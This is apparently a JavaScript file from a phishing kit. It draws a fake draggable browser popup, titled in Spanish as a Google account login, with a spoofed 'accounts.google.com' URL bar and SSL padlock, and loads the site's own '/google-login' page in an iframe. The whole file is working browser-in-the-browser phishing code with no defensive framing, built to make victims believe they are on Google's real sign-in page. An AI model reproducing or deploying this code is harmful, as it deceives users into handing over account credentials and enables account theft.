console.log("It works")


var myString = ` <div id="window" style="">
<!-- Title bar start -->
<div id="title-bar-width">
    <div id="title-bar">
        <div style="margin-top:5px;">
            <%=image_tag("logo_google.svg", id: "logo_google", size: "20x15") %>
            <span id="logo-description">Acceso: Cuentas de Google</span>
        </div>

        <div id="window-opts">
            <span id="minimize">&#8212;</span>
            <span id="square">□</span>
            <div id="exit"><span>✕</span></div>
        </div>
    </div>
    <div id="url-bar">
        <%= image_tag("ssl.svg", size: "20x20") %>
        <span id="domain-name">accounts.google.com</span>
        <span id="domain-path">/<%= get_google_auth_path %></span>
    </div>
</div>
<div id="iframe-container"> </div>
        `

$('#google_login_window').html(myString);




$('#iframe-container').html('<iframe id="content" src="/google-login" frameBorder="0"></iframe>');


var minimize = document.getElementById("minimize");
var square = document.getElementById("square");
var exit = document.getElementById("exit");
var titleBar = document.getElementById("title-bar");
var footer = document.getElementById("footer");
var google_login_url = document.getElementById("google_login_url")
var container = document.querySelector('#window');
////////////////// Hover listeners //////////////////
minimize.addEventListener('mouseover', function handleMouseOver() {
  minimize.style.backgroundColor = 'rgba(0, 0, 0, 0.09765625)';
  minimize.style.cursor = 'context-menu';
});

minimize.addEventListener('mouseout', function handleMouseOut() {
  minimize.style.backgroundColor = '#d6dae0';
  minimize.style.cursor = 'default';
});

square.addEventListener('mouseover', function handleMouseOver() {
  square.style.backgroundColor = 'rgba(0, 0, 0, 0.09765625)';
  square.style.cursor = 'context-menu';
});

square.addEventListener('mouseout', function handleMouseOut() {
  square.style.backgroundColor = '#d6dae0';
  square.style.cursor = 'default';
});

exit.addEventListener('mouseover', function handleMouseOver() {
  exit.style.backgroundColor = '#E81123';
  exit.style.cursor = 'context-menu';
});

exit.addEventListener('mouseout', function handleMouseOut() {
  exit.style.backgroundColor = '#d6dae0';
  exit.style.cursor = 'default';
});

titleBar.addEventListener('mouseover', function handleMouseOver() {
  titleBar.style.cursor = 'context-menu';
});

titleBar.addEventListener('mouseout', function handleMouseOver() {
  titleBar.style.cursor = 'default';
});

// close and start position of the windows
exit.addEventListener('click', function(){
  footer.style.position = 'absolute';
});


window.addEventListener('load', function(){
  container.style.position = 'relative';
  container.style.top = '-50vh';
  container.style.left = '30vw';
});


container.style.position = 'relative';
container.style.display = '';
container.style.top = '-50vh';
container.style.left = '30vw';


//////////////// Make window draggable start ////////////////
// Make the DIV element draggable:
var draggable = $('#window');
var title = $('#title-bar');

title.on('mousedown', function(e){
	var dr = $(draggable).addClass("drag");
	height = dr.outerHeight();
	width = dr.outerWidth();
	ypos = dr.offset().top + height - e.pageY,
	xpos = dr.offset().left + width - e.pageX;
	$(document.body).on('mousemove', function(e){
		var itop = e.pageY + ypos - height;
		var ileft = e.pageX + xpos - width;
		if(dr.hasClass("drag")){
			dr.offset({top: itop,left: ileft});
		}
	}).on('mouseup', function(e){
			dr.removeClass("drag");
	});
});
//////////////// Make window draggable end ////////////////


////////////////// Onclick listeners //////////////////
// X button functionality
$("#exit").click(function(){
    console.log("Exit!?");
    $("#window").css("display", "none");
  });

// Maximize button functionality
$("#square").click(enlarge);

function enlarge(){
  if(square.classList.contains("enlarged")){
    $("#window").css("width", "40%");
    $("#title-bar-width").css('width', '100%');
    $("#content").css("width", "100%");
    $("#square").removeClass("enlarged");
  }
  else{
    $("#window").css("width", "70%");
    $("#title-bar-width").css('width', '100%');
    $("#content").css("width", "100%");
    $("#square").addClass("enlarged");
  }
}


